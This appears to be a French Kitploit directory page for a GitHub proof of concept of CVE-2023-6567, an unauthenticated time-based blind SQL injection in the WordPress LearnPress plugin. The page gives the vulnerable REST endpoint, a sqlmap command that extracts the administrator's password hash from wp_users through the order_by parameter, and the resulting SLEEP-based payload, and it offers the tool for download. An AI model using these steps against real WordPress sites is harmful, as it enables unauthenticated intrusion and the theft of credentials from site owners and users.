Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6567-poc — Preuve de concept d'exploitation pour une injection SQL aveugle basée sur le temps dans le plugin WordPress LearnPress, permettant à des attaquants non authentifiés d'extraire des données sensibles via le paramètre `order_by`. | Kitploit
Outils/GitHubGitHub/mimiloveexe/cve-2023-6567-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmimiloveexe/cve-2023-6567-poc

CVE-2023-6567-poc

Preuve de concept d'exploitation pour une injection SQL aveugle basée sur le temps dans le plugin WordPress LearnPress, permettant à des attaquants non authentifiés d'extraire des données sensibles via le paramètre `order_by`.

Voir le dépôt
56il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-6567-poc

Injection SQL basée sur le temps

Description Le plugin ne nettoie et n'échappe pas correctement le paramètre order_by avant de l'utiliser dans une requête SQL, ce qui entraîne une injection SQL exploitable par des utilisateurs non authentifiés

  1. Requête GET vulnérable : https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

  2. Enregistrer la requête GET

  3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'

  4. sqlmap a repris le(s) point(s) d'injection suivant(s) à partir de la session enregistrée :


Paramètre : #1* (URI) Type : aveugle basé sur le temps Titre : MySQL >= 5.0.12 AND aveugle basé sur le temps (requête SLEEP) Payload : https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

Télécharger l’outil